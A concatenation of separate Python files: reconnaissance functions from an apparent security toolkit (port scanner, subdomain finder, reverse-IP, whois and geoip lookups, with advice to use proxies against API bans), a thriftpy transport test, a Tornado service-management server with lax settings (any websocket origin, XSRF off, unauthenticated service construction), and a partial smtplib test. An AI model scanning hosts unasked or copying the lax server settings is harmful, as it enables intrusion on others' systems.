except Exception as e:
pass
return h
def norton_rate(u,logs=True,returning=False,timeout=15,proxy=None):
'''
    this function takes any given link and returns a security report from: safeweb.norton.com, e.g. whether it is a spam domain, contains malware...
    it takes these arguments:
    u: the link to check
    logs: (set by default to: True) show the process and the report; you can turn it off by setting it to: False
    returning: (set by default to: False) return the report as a string if it is set to: True
usage:
>>>import bane
>>>url='http://www.example.com'
    >>>bane.norton_rate(url)
'''
if proxy:
proxy={'http':'http://'+proxy}
s=""
try:
if logs==True:
print('[*]Testing link with safeweb.norton.com')
ur=urllib.quote(u, safe='')
ul='https://safeweb.norton.com/report/show?url='+ur
c=requests.get(ul, headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
soup = BeautifulSoup(c, "html.parser").text
s=soup.split("Summary")[1].split('=')[0]
s=s.split("The Norton rating")[0].split('=')[0]
if logs==True:
print('[+]Report:\n',s.strip())
except:
pass
if returning==True:
return s.strip()
def myip(proxy=None,proxy_type=None,timeout=15):
'''
this function is for getting your ip using: ipinfo.io
usage:
>>>import bane
>>>bane.myip()
xxx.xx.xxx.xxx
'''
proxies={}
if proxy:
if proxy_type.lower()=="http":
proxies = {
"http": "http://"+proxy,
}
if proxy_type.lower()=="socks4":
proxies = {
"http": "socks4://"+proxy,
}
if proxy_type.lower()=="socks5":
proxies = {
"http": "socks5://"+proxy,
}
try:
return requests.get("http://ipinfo.io/ip",headers = {'User-Agent': random.choice(ua)}, proxies=proxies ,timeout=timeout).text.strip()
except:
pass
return ''
def who_is(u):
u=u.replace('www.','')
try:
return whois.whois(u)
except:
pass
return {}
def geoip(u,timeout=15,proxy=None):
'''
this function is for getting: geoip informations
'''
try:
if proxy:
proxy={'http':'http://'+proxy}
r=requests.get('https://geoip-db.com/jsonp/'+u,headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
return json.loads(r.split('(')[1].split(')')[0])
except:
pass
return {}
def headers(u,timeout=10,logs=True,returning=False,proxy=None):
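    # Fetch `u` and either print its HTTP response headers (logs=True), return
    # the headers mapping (returning=True), or both; returns None on failure.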
try:
if proxy:
proxy={'http':'http://'+proxy}
s=requests.session()
a=s.get(u,headers = {'User-Agent': random.choice(ua)} ,proxies=proxy,timeout=timeout).headers
except Exception as ex:
return None
if logs==True:
for x in a:
print("{} : {}".format(x,a[x]))
if returning==True:
return a
def reverse_ip_lookup(u,timeout=10,logs=True,returning=False,proxy=None):
'''
    this function is for: reverse IP lookup
    if you've used it 100 times in 24 hours, your IP will be banned by "api.hackertarget.com", so i highly recommend you use the "proxy" option by adding a http(s) proxy:
bane.reverse_ip_lookup('XXX.XXX.XXX.XXX',proxy='IP:PORT')
'''
if proxy:
proxy={'http':'http://'+proxy}
try:
r=requests.get("https://api.hackertarget.com/reverseiplookup/?q="+u,headers = {'User-Agent': random.choice(ua)} ,proxies=proxy,timeout=timeout).text
return r.split('\n')
except Exception as ex:
pass
return []
'''
end of the information gathering functions using: api.hackertarget.com
'''
def resolve(u,server='8.8.8.8',timeout=1,lifetime=1):
o=[]
r = dns.resolver.Resolver()
    r.timeout = timeout    # honor the caller-supplied values instead of hard-coding 1
    r.lifetime = lifetime
r.nameservers = [server]
a = r.query(u)
for x in a:
o.append(str(x))
return o
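# Usage sketch for resolve (assumes dnspython provides the "dns.resolver" used
# above; the answer list depends on the record set and is illustrative only):
#     >>> bane.resolve('example.com', server='1.1.1.1', timeout=2, lifetime=2)
#     ['93.184.216.34']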
"""
this class is used to scan a target for open ports
usage:
a=bane.port_scan("8.8.8.8",ports=[21,22,23,80,443,3306],timeout=5)
print(a.result)
this should give you a dict like this:
{'443': 'Open', '22': 'Closed', '21': 'Closed', '23': 'Closed', '80': 'Closed', '3306': 'Closed'}
"""
class port_scan:
    def scan(self, index):
        # each worker thread probes a single port; passing the index in as an
        # argument avoids racing on shared state between threads
        p=self.por[index]
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.timeout)
r = s.connect_ex((self.target, int(p)))
if r == 0:
self.result.update({str(p):"Open"})
else:
self.result.update({str(p):"Closed"})
s.close()
def __init__(self,u,ports=[21,22,23,25,43,53,80,443,2082,3306],timeout=5):
try:
thr=[]
self.result={}
self.timeout=timeout
self.por=ports
self.target=u
            for x in range(len(self.por)):
                t=threading.Thread(target=self.scan,args=(x,))
                thr.append(t)  # Thread.start() returns None, so keep the Thread object itself
                t.start()
                time.sleep(.001)
while(len(self.result)!=len(ports)):
time.sleep(.1)
except:
pass
for x in thr:
try:
x.join(1)
except:
pass
del x
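# Design note: port_scan spawns one thread per port and each worker writes its
# verdict into the shared "result" dict; the constructor then polls until every
# port has reported. For large port lists a bounded pool (e.g.
# concurrent.futures.ThreadPoolExecutor) would be a gentler alternative.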
def subdomains_finder(u,process_check_interval=5,logs=True,returning=False,requests_timeout=15,https=False):
https_flag=0
if (https==True) or('https://' in u):
https_flag=1
if "://" in u:
host=u.split('://')[1].split('/')[0]
else:
host=u
sd=[]
while True:
try:
s=requests.session()
r=s.post('https://scan.penteston.com/scan_system.php',data={"scan_method":"S201","test_protocol":https_flag,"test_host":host},timeout=requests_timeout).text
if '"isFinished":"no"' not in r:
if logs==True:
print("\n[+]Scan results:")
c=r.split('strong><br\/>')[1].replace('"}','')
for x in (c.split('<br\/>')):
if x.strip():
if logs==True:
print(x)
sd.append(x)
if returning==True:
return sd
break
else:
if logs==True:
sys.stdout.write("\r[*]Scan in progress...")
sys.stdout.flush()
#print("[*]Scan in progress...")
except KeyboardInterrupt:
break
except:
pass
try:
time.sleep(process_check_interval)
except KeyboardInterrupt:
break
except:
pass
if returning==True:
return []
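# Usage sketch for subdomains_finder (assumes scan.penteston.com is up and its
# response format is unchanged; results depend on the target and are illustrative):
#     >>> bane.subdomains_finder('https://example.com', logs=False, returning=True)
#     ['www.example.com', 'mail.example.com', ...]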
|
test_framed_transport.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import sys
import logging
import socket
import threading
import time
from os import path
from unittest import TestCase
import pytest
from tornado import ioloop
import thriftpy
from thriftpy.tornado import make_server
from thriftpy.rpc import make_client
from thriftpy.transport.framed import TFramedTransportFactory
from thriftpy.protocol.binary import TBinaryProtocolFactory
try:
import asyncio
except ImportError:
asyncio = None
from thriftpy._compat import CYTHON
logging.basicConfig(level=logging.INFO)
addressbook = thriftpy.load(path.join(path.dirname(__file__),
"addressbook.thrift"))
class Dispatcher(object):
def __init__(self, io_loop):
self.io_loop = io_loop
self.registry = {}
def add(self, person):
"""
bool add(1: Person person);
"""
if person.name in self.registry:
return False
self.registry[person.name] = person
return True
def get(self, name):
"""
Person get(1: string name)
"""
if name not in self.registry:
raise addressbook.PersonNotExistsError()
return self.registry[name]
class FramedTransportTestCase(TestCase):
TRANSPORT_FACTORY = TFramedTransportFactory()
PROTOCOL_FACTORY = TBinaryProtocolFactory()
def mk_server(self):
sock = self.server_sock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
sock.setblocking(0)
self.port = sock.getsockname()[-1]
self.server_thread = threading.Thread(target=self.listen)
        self.server_thread.daemon = True
self.server_thread.start()
def listen(self):
self.server_sock.listen(128)
if asyncio:
# In Tornado 5.0+, the asyncio event loop will be used
# automatically by default
asyncio.set_event_loop(asyncio.new_event_loop())
self.io_loop = ioloop.IOLoop.current()
server = make_server(addressbook.AddressBookService,
Dispatcher(self.io_loop), io_loop=self.io_loop)
server.add_socket(self.server_sock)
self.io_loop.start()
def mk_client(self):
return make_client(addressbook.AddressBookService,
'127.0.0.1', self.port,
proto_factory=self.PROTOCOL_FACTORY,
trans_factory=self.TRANSPORT_FACTORY)
def setUp(self):
self.mk_server()
time.sleep(0.1)
self.client = self.mk_client()
def tearDown(self):
self.io_loop.stop()
@pytest.mark.skipif(sys.version_info[:2] == (2, 6), reason="not support")
def test_able_to_communicate(self):
dennis = addressbook.Person(name='Dennis Ritchie')
success = self.client.add(dennis)
assert success
success = self.client.add(dennis)
assert not success
@pytest.mark.skipif(sys.version_info[:2] == (2, 6), reason="not support")
def test_zero_length_string(self):
dennis = addressbook.Person(name='')
success = self.client.add(dennis)
assert success
success = self.client.get(name='')
assert success
if CYTHON:
from thriftpy.transport.framed import TCyFramedTransportFactory
from thriftpy.protocol.cybin import TCyBinaryProtocolFactory
class CyFramedTransportTestCase(FramedTransportTestCase):
PROTOCOL_FACTORY = TCyBinaryProtocolFactory()
TRANSPORT_FACTORY = TCyFramedTransportFactory()
|
server.py
|
#!/usr/bin/python
# logging should be setup first so imported modules' logging is configured too
import os
from vai.dpuv1.rt import logging_mp
log_file = os.environ['VAI_ALVEO_ROOT'] + "/neptune/logging.ini"
logging_mp.setup_logger(log_file, 'neptune')
from datetime import datetime
import json
import signal
import threading
import time
import tornado.ioloop
import tornado.web
import tornado.websocket
import uuid
import importlib
import logging
import six
if six.PY3:
import asyncio
import numpy as np
from tornado.options import define, options, parse_command_line
if six.PY3:
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
from neptune.common import DummyClass, list_submodules, hinted_tuple_hook
if six.PY3:
from neptune.common_py3 import cancel_async_tasks
else:
from neptune.common import cancel_async_tasks
import neptune.construct as construct
from neptune.service_manager import ServiceManager
from neptune.node_manager import NodeManager
from vai.dpuv1.rt import xstream
define("port", default=8998, help="run web server on this port", type=int)
define("wsport", default=8999, help="run websocket server on this port", type=int)
define("debug", default=True, help="run in debug mode")
logger = logging.getLogger(__name__)
class IndexHandler(tornado.web.RequestHandler):
def get(self, *args):
self.render("index.html", wsport=options.wsport)
class ListServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
ret = {'services': []}
try:
services_list = ServiceManager().list()
services = []
for name, svc in services_list.items():
services.append({
'name': name,
'state': svc['state'],
'url': svc['url'],
'throughput': svc['throughput']
})
services.sort(key=lambda x: x['name'])
ret = {'services': services}
except Exception as e:
logger.exception("List service error")
self.write(json.dumps(ret, sort_keys=True))
class QueryServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("service")
ret = {}
try:
services_list = ServiceManager().list()
if service_name in services_list:
ret = services_list[service_name]
del ret['service']
except Exception as e:
logger.exception("Query service error")
self.write(json.dumps(ret, sort_keys=True))
class StartServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("id")
runtime_args = self.get_argument("args", {})
ServiceManager().start(service_name, runtime_args)
self.write("service started")
def post(self, *args):
data = json.loads(self.request.body)
service_name = data["id"] # in unicode
runtime_args = data["args"] if 'args' in data else {}
ServiceManager().start(service_name, runtime_args)
self.write("service started")
class StopServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
service_name = self.get_argument("id")
ServiceManager().stop(service_name)
self.write("service stopped")
class ConstructServiceHandler(tornado.web.RequestHandler):
def get(self, *args):
self.write("POST a recipe to this address to construct it")
def post(self, *args):
"""
Parse JSON arguments in POST body. In Requests module, use json key to
pass in arguments, not data (which may clobber JSON objects)
"""
recipe = json.loads(self.request.body, object_hook=hinted_tuple_hook)
tornado_handler = construct.construct(recipe)
name = str(recipe['name'])
url = str(recipe['url'])
self.application.add_handlers(
r".*", # match any host
tornado_handler
)
self.write("service %s constructed at /serve/%s" % (name, url))
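# Example client call for ConstructServiceHandler (a sketch: the handler is
# registered at /services/construct and the web port defaults to 8998 per the
# define() above; only "name" and "url" are read explicitly here, any other
# recipe fields shown would be hypothetical):
#     import requests
#     requests.post('http://localhost:8998/services/construct',
#                   json={'name': 'my_service', 'url': 'my_service'})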
# FIXME clients being able to destroy services others may be using is problematic
class DestructServiceHandler(tornado.web.RequestHandler):
def _destroy(self):
url = str(self.get_argument("url"))
name = str(self.get_argument("name"))
fake_request = DummyClass()
found_index = -1
# There's no method in Tornado to delete an added handler currently.
# By examining the source, the code below works to do so. If Tornado
# adds an API to do this, this code should be replaced. It may also
# break with changes to Tornado (tested with Tornado 5.1.1 on 8/15/2019)
for index, parent_rule in enumerate(self.application.default_router.rules):
rules = parent_rule.target.rules
for rule in rules:
fake_request.path = r"/serve/" + url
if isinstance(rule.matcher.match(fake_request), dict):
found_index = index
return found_index, name, url
def get(self, *args):
        self.write("POST the name and url of the service to destroy")  # TODO: only one of these should be needed
def post(self, *args):
found_index, name, url = self._destroy()
if found_index != -1:
del self.application.default_router.rules[found_index]
ServiceManager().remove(name)
recipe_cache = os.environ["VAI_ALVEO_ROOT"] + "/neptune/recipes/recipe_%s.bak" % name
os.remove(recipe_cache)
self.write("service destroyed at /serve/%s" % url)
else:
self.write("Service %s cannot be destroyed as it does not exist" % name)
class RenderHandler(tornado.web.RequestHandler):
def get(self, *args):
url = self.request.uri
url_arg = url.split('/')[-1]
html = url_arg + ".html"
self.render(html, wsport=options.wsport)
class RequestIdGenerator(object):
def __init__(self):
self.handler_ids = {}
def get(self, name='__default__'):
if name not in self.handler_ids:
self.handler_ids[name] = 0
curr_id = self.handler_ids[name]
self.handler_ids[name] = (curr_id + 1) % 10000 # wraparound
return curr_id
class WebSocketHandler(tornado.websocket.WebSocketHandler):
clientConnections = []
def __init__(self, *args, **kwargs):
super(WebSocketHandler, self).__init__(*args, **kwargs)
print("[WS] websocket ready")
def open(self):
self.id = str(uuid.uuid4())
self.last_send = None
print("[WS] websocket opened %s" % self.id)
self.send('id', self.id)
WebSocketHandler.clientConnections.append(self)
def on_message(self, messageStr):
try:
print('[WS] message received from %s: %s' % (self.id, messageStr))
message = json.loads(messageStr)
if message['topic'] == 'update_id':
origId = message['id']
self.id = origId # take over original id
except:
pass
def on_close(self):
print("[WS] websocket closed %s" % self.id)
WebSocketHandler.clientConnections.remove(self)
def send(self, topic, msg):
if not msg:
return
now = time.time()
if self.last_send and (now - self.last_send) < 0.05:
# don't flood the client with too many messages; drop
return
self.last_send = now
try:
msg_POD = {}
msg_POD['time'] = datetime.now().isoformat()
msg_POD['topic'] = topic
msg_POD['message'] = msg
self.write_message(json.dumps(msg_POD))
except Exception as e:
print(e)
@staticmethod
def send_to_client(id, topic, msg):
try:
for c in WebSocketHandler.clientConnections:
if c.id == id:
c.send(topic, msg)
except:
pass
@staticmethod
def broadcast(topic, msg):
try:
for c in WebSocketHandler.clientConnections:
c.send(topic, msg)
except:
pass
def check_origin(self, origin):
return True
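# Wire format sent to websocket clients, as constructed in send() above:
#   {"time": "<ISO timestamp>", "topic": "<topic>", "message": <payload>}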
class ServerWebApplication(tornado.web.Application):
def __init__(self):
self.request_id_gen = RequestIdGenerator()
handlers = self.init_handlers()
super(ServerWebApplication, self).__init__(
handlers,
cookie_secret="COOKIE_SECRET",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
            xsrf_cookies=False,  # TODO: should this be True?
autoreload=False,
debug=options.debug
)
def init_handlers(self):
"""
Define the basic REST handlers. These cannot be destroyed.
Returns:
List: List of handler tuples for initializing a Tornado web app
"""
handlers = []
handlers.append((r"/", IndexHandler))
handlers.append((r"/services/list", ListServiceHandler))
handlers.append((r"/services/query", QueryServiceHandler))
handlers.append((r"/services/start", StartServiceHandler))
handlers.append((r"/services/stop", StopServiceHandler))
handlers.append((r"/services/construct", ConstructServiceHandler))
handlers.append((r"/services/destruct", DestructServiceHandler))
handlers.append((r"/render/([^/]+)", RenderHandler))
return handlers
class ServerApp(object):
def __init__(self):
signal.signal(signal.SIGINT, self.signal_handler)
# signal.signal(signal.SIGQUIT, self.sigquit_handler)
self.do_exit = False
self.hbeat_id = 0
self.hbeat = 0
# self.do_restart = False
self.xserver = xstream.Server()
parse_command_line()
self.web_app = ServerWebApplication()
# Add handlers for default services here so they can be destroyed if
# needed. Handlers installed in the web_app __init__ cannot be destroyed.
recipes = self.get_recipes()
for recipe in recipes:
tornado_handler = construct.construct(recipe)
self.web_app.add_handlers(
r".*", # match any host
tornado_handler
)
self.web_server = self.web_app.listen(options.port)
self.ws_app = tornado.web.Application([(r"/", WebSocketHandler)])
self.ws_server = self.ws_app.listen(options.wsport)
self.xspub = xstream.Publisher()
self.xs2server = threading.Thread(target=ServerApp.xstream2server)
self.xs2server.start()
self.heartbeat_thread = threading.Thread(target=ServerApp.heartbeat, args=(lambda: self.do_exit,))
self.heartbeat_thread.start()
@staticmethod
def get_recipes():
"""
Get all recipes from the recipes folder. If recipe_*.bak files exist,
use those to construct services. Otherwise, construct from source using
the default recipe functions.
"""
recipes = []
recipes_cache = os.environ["VAI_ALVEO_ROOT"] + "/neptune/recipes/"
file_names = [fn for fn in os.listdir(recipes_cache)
if fn.startswith('recipe_') and fn.endswith('.bak')]
if file_names:
logger.info("Constructing services from cache")
for file_name in file_names:
with open(recipes_cache + file_name) as f:
recipes.append(json.load(f, object_hook=hinted_tuple_hook))
else:
logger.info("Constructing services from source")
modules = list_submodules('neptune.recipes')
for module_path in modules:
module = importlib.import_module(module_path)
attrs = dir(module)
for attr in attrs:
if attr.startswith('recipe_'):
recipe = getattr(module, attr)
if callable(recipe):
recipes.append(recipe().to_dict())
return recipes
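    # Cache layout get_recipes expects (a sketch; the specific file names are
    # hypothetical, following the "recipe_*.bak" pattern checked above):
    #   $VAI_ALVEO_ROOT/neptune/recipes/recipe_ping.bak  -> JSON-serialized recipe
    #   $VAI_ALVEO_ROOT/neptune/recipes/recipe_sface.bak -> JSON-serialized recipe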
@staticmethod
def xstream2server():
xs = xstream.Subscribe("__server__")
while True:
# subscribe to special "__server__" channel for
# other processes to send messages to this server
# e.g. speedodata -> websockets
msg_str = xs.get_msg()
if msg_str is None:
break
try:
msg = json.loads(msg_str)
if msg['topic'] == 'speedodata':
WebSocketHandler.broadcast(msg['topic'], msg['message'])
elif msg['topic'] == 'callback' and 'callback_id' in msg:
# print("sending callback message")
# print(msg['message'])
WebSocketHandler.send_to_client(\
msg['callback_id'], msg['topic'], msg['message'])
elif msg['topic'] == 'xs_throughput':
report = json.loads(msg['message'])
#print(report)
for name, throughput in report.items():
serviceName = name.split('.')[0]
edgeName = name[name.find('.')+1:]
ServiceManager().update_throughput_stats(serviceName,
edgeName, throughput)
except:
pass
cancel_async_tasks()
@staticmethod
def heartbeat(stop):
xs = xstream.Subscribe("__heartbeat__", timeout=5000)
service_manager = ServiceManager()
node_status = {}
def check_services(node_status):
            if stop():  # call the flag getter; the lambda object itself is always truthy
                return
invalid_services = []
for service, status in node_status.items():
last_valid = status['last_valid']
service_state = service_manager._services[service]['state']
is_starting = service_state == service_manager.STARTING
is_started = service_state == service_manager.STARTED
# if the service has been stopped, clear it
if service_state == service_manager.STOPPED:
invalid_services.append(service)
# if there's a discrepancy in what the service_manager says
# and what we have cached, clear it
elif is_starting and node_status[service]['is_started']:
invalid_services.append(service)
# if it's started and hasn't been valid in the last n secs,
# restart it
elif is_started and now - last_valid > 5:
logger.warning("Service %s is dead, restarting" % service)
service_manager.stop(service)
service_manager.start(service)
node_status[service]['is_started'] = False
for service in invalid_services:
del node_status[service]
logger = logging.getLogger(__name__)
while True:
if stop():
break
# when enabling coverage, this line will raise an exception for some
# reason. For now, just catching it
            try:
                msg_str = xs.get_msg()
                now = time.time()
            except Exception:
                logger.exception("Shouldn't happen")
                continue  # msg_str and now would be unbound below
# the get_msg timed out, i.e. no heartbeats received
if msg_str == (None, None):
check_services(node_status)
continue
msg = json.loads(msg_str)
service = msg['service']
channel = msg['channel']
# if this is the first time we've seen this service
if service not in node_status:
_first_edge, last_edge = service_manager._get_graph_io(service)
node_status[service] = {
'last_valid': 0, # saves the last time this service was valid
'is_started': False, # our check that services haven't stopped
'last_edge': last_edge[0], # saves the last edge of the service
'channels': {} # save heartbeat times for each channel
}
node_status[service]['channels'][channel] = now
service_state = service_manager._services[service]['state']
if node_status[service]['last_edge'] == channel:
if service_state == service_manager.STARTING:
if not node_status[service]['is_started']:
service_manager._services[service]['state'] = service_manager.STARTED
node_status[service]['is_started'] = True
else:
# there's a discrepancy. For example, the service may
# have been stopped and something else started with
# the same name. In this case, clear the cache
del node_status[service]
continue
node_status[service]['last_valid'] = now
check_services(node_status)
cancel_async_tasks()
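    # Heartbeat messages consumed above are JSON of the form (inferred from the
    # keys read in this method; the producer-side schema lives in the nodes):
    #   {"service": "<service name>", "channel": "<edge name>"}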
def launch(self):
tornado.ioloop.PeriodicCallback(self.check_exit, 500).start()
loop = tornado.ioloop.IOLoop.instance()
loop.start()
loop.close()
def signal_handler(self, signum, frame):
logger.status("Shutting down server...")
ServiceManager().stop_all()
self.do_exit = True
# def sigquit_handler(self, signum, frame):
# print("restarting server...")
# ServiceManager().stop_all()
# self.do_restart = True
def check_exit(self):
if self.do_exit:
self.xspub.end("__server__")
self.xs2server.join()
self.heartbeat_thread.join()
self.ws_server.stop()
self.web_server.stop()
cancel_async_tasks()
del self.xserver
elif self.hbeat > 4:
self.hbeat = 0
service_manager = ServiceManager()
services_list = service_manager.list()
started_services = []
for name, svc in services_list.items():
if svc['state'] >= service_manager.STARTING:
started_services.append(name)
for service in started_services:
msg = json.dumps({
'__heartbeat__': service,
'id': 'hbeat_' + str(self.hbeat_id)
})
service_manager.send(service, 0, np.zeros(1), msg)
self.hbeat_id = (self.hbeat_id + 1) % 9999
else:
self.hbeat += 1
# the restarted server is unresponsive. We don't need this functionality
# right now but if needed, it needs to be debugged.
# if self.do_restart:
# self.xspub.end("__server__")
# self.xs2server.join()
# self.ws_server.stop()
# self.web_server.stop()
# del self.xserver
# tornado.ioloop.IOLoop.instance().stop()
# self.do_restart = False
# ServiceManager()._drop()
# NodeManager()._drop()
# xstream.Statistics()._drop()
# main()
def main():
logging_directory = os.environ['VAI_ALVEO_ROOT'] + '/neptune/logs/'
log_name = '_{:%Y-%m-%d}.log'.format(datetime.now())
with open(logging_directory + 'neptune' + log_name, 'a') as f:
f.write("################################################################\n")
# https://github.com/tornadoweb/tornado/issues/2531
if six.PY3:
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
app = ServerApp()
app.launch()
if __name__ == "__main__":
main()
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=3, source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
    def testEHLO(self):
        # check the EHLO response advertised by DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
